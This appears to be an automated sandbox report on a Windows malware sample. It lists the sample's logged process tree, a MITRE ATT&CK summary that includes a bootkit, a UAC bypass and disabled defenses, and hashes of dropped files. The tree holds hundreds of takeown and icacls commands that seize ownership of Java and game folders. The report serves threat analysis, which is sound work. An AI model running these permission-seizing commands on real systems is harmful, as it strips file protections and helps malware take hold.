C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config" /grant Administrators:F2⤵PID:2764
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules" /a2⤵PID:1016
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules" /grant Administrators:F2⤵PID:3068
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core" /a2⤵PID:1656
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core" /grant Administrators:F2⤵PID:3020
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale" /a2⤵PID:2516
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale" /grant Administrators:F2⤵PID:1720
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules" /a2⤵PID:1520
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules" /grant Administrators:F2⤵PID:2556
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale" /a2⤵PID:2796
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale" /grant Administrators:F2⤵PID:1728
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking" /a2⤵PID:2144
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking" /grant Administrators:F2⤵PID:1876
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7" /a2⤵PID:352
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7" /grant Administrators:F2⤵PID:2584
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\bin" /a2⤵
- Possible privilege escalation attempt
PID:2656
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\bin" /grant Administrators:F2⤵PID:2612
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\bin\jabswitch.exe" /a2⤵PID:2028
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\bin\jabswitch.exe" /grant Administrators:F2⤵PID:448
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\bin\dtplugin" /a2⤵PID:1396
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\bin\dtplugin" /grant Administrators:F2⤵PID:1820
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\bin\plugin2" /a2⤵PID:2712
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\bin\plugin2" /grant Administrators:F2⤵PID:1968
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\bin\server" /a2⤵PID:2696
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\bin\server" /grant Administrators:F2⤵PID:1652
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib" /a2⤵PID:2528
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib" /grant Administrators:F2⤵PID:536
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\amd64" /a2⤵PID:1420
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\amd64" /grant Administrators:F2⤵PID:2464
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\applet" /a2⤵PID:2108
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\applet" /grant Administrators:F2⤵PID:2932
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\cmm" /a2⤵PID:1776
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\cmm" /grant Administrators:F2⤵PID:2828
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\deploy" /a2⤵PID:2856
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\deploy" /grant Administrators:F2⤵PID:2800
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\ext" /a2⤵PID:2428
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\ext" /grant Administrators:F2⤵PID:2440
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\fonts" /a2⤵PID:788
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\fonts" /grant Administrators:F2⤵PID:1348
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\images" /a2⤵PID:1460
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\images" /grant Administrators:F2⤵PID:2088
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\images\cursors" /a2⤵PID:1656
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\images\cursors" /grant Administrators:F2⤵PID:2376
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\jfr" /a2⤵PID:1880
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\jfr" /grant Administrators:F2⤵PID:2788
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\management" /a2⤵PID:2192
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\management" /grant Administrators:F2⤵PID:900
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\security" /a2⤵PID:1952
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\security" /grant Administrators:F2⤵PID:1152
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi" /a2⤵PID:2000
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi" /grant Administrators:F2⤵PID:1424
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\Africa" /a2⤵PID:1512
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\Africa" /grant Administrators:F2⤵
- Modifies file permissions
PID:2280
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\America" /a2⤵PID:1200
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\America" /grant Administrators:F2⤵PID:496
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\America\Argentina" /a2⤵PID:1412
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\America\Argentina" /grant Administrators:F2⤵PID:2432
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\America\Indiana" /a2⤵PID:2036
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\America\Indiana" /grant Administrators:F2⤵PID:1820
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\America\Kentucky" /a2⤵PID:1396
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\America\Kentucky" /grant Administrators:F2⤵PID:2052
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\America\North_Dakota" /a2⤵
- Modifies file permissions
PID:2332
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\America\North_Dakota" /grant Administrators:F2⤵PID:1212
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\Antarctica" /a2⤵PID:1408
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\Antarctica" /grant Administrators:F2⤵PID:2452
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\Asia" /a2⤵PID:2696
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\Asia" /grant Administrators:F2⤵PID:2068
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\Atlantic" /a2⤵PID:2776
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\Atlantic" /grant Administrators:F2⤵PID:696
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\Australia" /a2⤵PID:1916
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\Australia" /grant Administrators:F2⤵PID:536
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\Etc" /a2⤵PID:2752
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\Etc" /grant Administrators:F2⤵PID:780
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\Europe" /a2⤵PID:228
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\Europe" /grant Administrators:F2⤵PID:2016
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\Indian" /a2⤵PID:1736
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\Indian" /grant Administrators:F2⤵PID:3028
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\Pacific" /a2⤵PID:2276
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\Pacific" /grant Administrators:F2⤵PID:2188
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jre7\lib\zi\SystemV" /a2⤵PID:232
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jre7\lib\zi\SystemV" /grant Administrators:F2⤵PID:1348
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games" /a2⤵PID:1908
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games" /grant Administrators:F2⤵PID:1300
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Chess" /a2⤵PID:2348
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\Chess" /grant Administrators:F2⤵PID:2024
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Chess\Chess.exe" /a2⤵PID:1540
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\Chess\Chess.exe" /grant Administrators:F2⤵PID:1188
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Chess\de-DE" /a2⤵PID:876
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\Chess\de-DE" /grant Administrators:F2⤵PID:2368
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Chess\en-US" /a2⤵PID:2000
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\Chess\en-US" /grant Administrators:F2⤵PID:2496
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Chess\es-ES" /a2⤵PID:1704
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\Chess\es-ES" /grant Administrators:F2⤵PID:2484
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Chess\fr-FR" /a2⤵PID:692
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\Chess\fr-FR" /grant Administrators:F2⤵PID:2536
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Chess\it-IT" /a2⤵PID:2612
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\Chess\it-IT" /grant Administrators:F2⤵PID:2656
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Chess\ja-JP" /a2⤵PID:1468
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\Chess\ja-JP" /grant Administrators:F2⤵PID:332
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\FreeCell" /a2⤵PID:2868
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\FreeCell" /grant Administrators:F2⤵PID:2328
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\FreeCell\FreeCell.exe" /a2⤵PID:204
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\FreeCell\FreeCell.exe" /grant Administrators:F2⤵PID:1648
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\FreeCell\de-DE" /a2⤵PID:2152
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\FreeCell\de-DE" /grant Administrators:F2⤵PID:1396
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\FreeCell\en-US" /a2⤵PID:2036
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\FreeCell\en-US" /grant Administrators:F2⤵PID:2568
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\FreeCell\es-ES" /a2⤵PID:212
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\FreeCell\es-ES" /grant Administrators:F2⤵PID:644
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\FreeCell\fr-FR" /a2⤵PID:2800
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\FreeCell\fr-FR" /grant Administrators:F2⤵PID:1232
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\FreeCell\it-IT" /a2⤵PID:952
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\FreeCell\it-IT" /grant Administrators:F2⤵PID:1692
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\FreeCell\ja-JP" /a2⤵PID:1460
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\FreeCell\ja-JP" /grant Administrators:F2⤵PID:2092
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Hearts" /a2⤵PID:2188
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\Hearts" /grant Administrators:F2⤵PID:2948
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Hearts\Hearts.exe" /a2⤵PID:1888
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\Hearts\Hearts.exe" /grant Administrators:F2⤵PID:1656
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Hearts\de-DE" /a2⤵PID:2076
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\Hearts\de-DE" /grant Administrators:F2⤵PID:1552
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Hearts\en-US" /a2⤵PID:756
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\Hearts\en-US" /grant Administrators:F2⤵PID:1980
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Hearts\es-ES" /a2⤵PID:2972
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Games\Hearts\es-ES" /grant Administrators:F2⤵PID:1512
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Games\Hearts\fr-FR" /a2⤵PID:1216
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:1004
Network
MITRE ATT&CK Enterprise v15
Persistence
- Create or Modify System Process: 1
  - Windows Service: 1
- Event Triggered Execution: 1
  - Image File Execution Options Injection: 1
- Pre-OS Boot: 1
  - Bootkit: 1
Privilege Escalation
- Abuse Elevation Control Mechanism: 1
  - Bypass User Account Control: 1
- Create or Modify System Process: 1
  - Windows Service: 1
- Event Triggered Execution: 1
  - Image File Execution Options Injection: 1
Defense Evasion
- Abuse Elevation Control Mechanism: 1
  - Bypass User Account Control: 1
- Direct Volume Access: 1
- File and Directory Permissions Modification: 2
  - Windows File and Directory Permissions Modification: 1
- Impair Defenses: 2
  - Disable or Modify Tools: 2
- Indicator Removal: 2
  - File Deletion: 2
- Modify Registry: 3
- Pre-OS Boot: 1
  - Bootkit: 1
Downloads
-
Filesize
8.0MB
MD5930e5afb18586a084cbaf710122d1b08
SHA1765684823003a3e75a8e73dd2089c18bb7ce256f
SHA256aad461b7b2db24c1449cce475bda20c0698d4cda855eb229f1a1e816e18c5af3
SHA5127d04eac6afb36b535f290e2be89607aeb7f5e41e32137347bd10598ce3d9160c01dd430cf1703151e060a2c2b58e6bf24f6f316e80595d4cbedd3f39122400d3
-
Filesize
420KB
MD51910d3503a74274db73b107540f9da5e
SHA1f2d907a7121e5cc21bacf24187f7fed7113d94e6
SHA256d7bb323a8416ebb44bbc74e0b3ea4b17bf788ec39d2f57b850b657a356fc0b73
SHA512da2efe0debc27871cda851380d5287ab7434ba486a532af5e90dcc7950b7cec24430de757c98ed8d7ba6850bd6ebc870d5dbdc2ac8e47d4808fda5e56ae41d28
-
Filesize
60KB
MD5422d954e544f8023c83b70ad479bb093
SHA1a73a997477c45fd9f7bea39bcffaf997a282276b
SHA2563d3b5eba79d784945866d18b04827c61ba5268a4e6cce1776e4c3d4140e1d67a
SHA512cd3f8056b71f63c84f3b0a9e68a5af36444fff30307797af5bebe9f934c0bee63407d87f75d97ac214e372d7aac993b948d4174bb8da49366dae80f68943e6ba
-
Filesize
2.3MB
MD5b2672bb8f1bc96861d4763544eadc5fd
SHA1f09c96e01977e12e76b808d2322e1daa7d17d361
SHA25663d5e27d3e2c92a561155c9709d8a83f7fd8f37fb8d3c9eba17405f7979f1554
SHA51216c9c3dbfd11d71c24f1fb3adef121caf8df7ddfb7310befd0404d940abecb9665f00b4aee7764929b4a770ffec4abffd8cc41e3c8620c116f0d9f23027463cc
-
Filesize
4.3MB
MD5c0518cef4fca5b87c5eb5bbd8014557c
SHA100737eb62d3702142f6b614b5413be4dc950d950
SHA256277fcb370cdd6c8b853aac0e3a32bb0ee4272ddc14baafd76a973740aa10981f
SHA5124097229d7d2d5844cb2b4ac316ac395abff31fc2ad19e3c0650e41347d37ca178cd07a4f0a9d44f7c2aa1edb22119b90a82e5be5c7ebe75c3c3db3178e0daf86
-
Filesize
881KB
MD538758b6434bb96639f79be463440073f
SHA1c55a5de9b002f4d54f2e948751f3c925e30c7082
SHA2560a7063f017eba4096a714527e40f97dcce50e7ec0c8da28435b8f80663074dc6
SHA5124ec0bef43c01846693cdf131560f2dd103aeb89a27770993bbe096c39441db9ad8e325e92ddd1bb079f2bd0e93ab07d6041b050eeeb2141f134b21a5e551c3b7
-
Filesize
1.3MB
MD5b5f78ab86d4e7e2d3e9f5d4701e66381
SHA13ff1401470befdbc0635d3848ba9f16f94012319
SHA2564f0a5e31cea074f5ebbd902a665f3effa5e908aafa551c3fc1599cc2bf641389
SHA512b71979c9ae0462d2f78ec3ec9d53e8901e6396c651581ae5c3dcf64d29ecdfaec46ca7caa1fe4dd5863b29b57795fda178bf73e5da433b6e5f3a36def638d558
-
Filesize
307KB
MD5f1a9b4b1f750bb90b7240f38aa3fd939
SHA14d630bd6b89f4ba0315ed37035d5e32775a7b969
SHA2567cc9be747a138d8b9e716ee5f16188215b730af91d9fe954d8e172f515f5b498
SHA512e4d6eea0e415d27f39224af29cef84bd55fb098b06c7aaee38d6eac34621ca3585bbae0d2fc2938bbe5755fd6d3bbbf47f9c4bc29a6e6914f761c1c76e4a107f
-
Filesize
4KB
MD57df14f970f590c0b23bb134d888278bc
SHA12ee7658c0066f70f196ffd38683a0e948f128ace
SHA256f578d34366cc6c7ed83aa3da2d4e086348ef87c7f6584180a2db0a07cf417c1e
SHA512c1ea6e6f4be80c8fd9745bdc99022b4966ed74487cb11a3f10d4c4f9c5cf711062a2470f192e0a2e73b653497bfaee75f74ecbcbf97e6f3e205a61d45ea975fc
-
Filesize
57KB
MD5cf45949cdbb39c953331cdcb9cec20f8
SHA16756f752141602424af234433dadedc12520165d
SHA25634df739526c114bb89470b3b650946cbf7335cb4a2206489534fb05c1fc143a8
SHA512b699b406bb4df8c6fb6339219ab1feaa5c7b2c39082d3761689e9b5326e52861bb8e2770d683838b05e649ff2022f413dc1e3f7e605a03077190f8950f9442be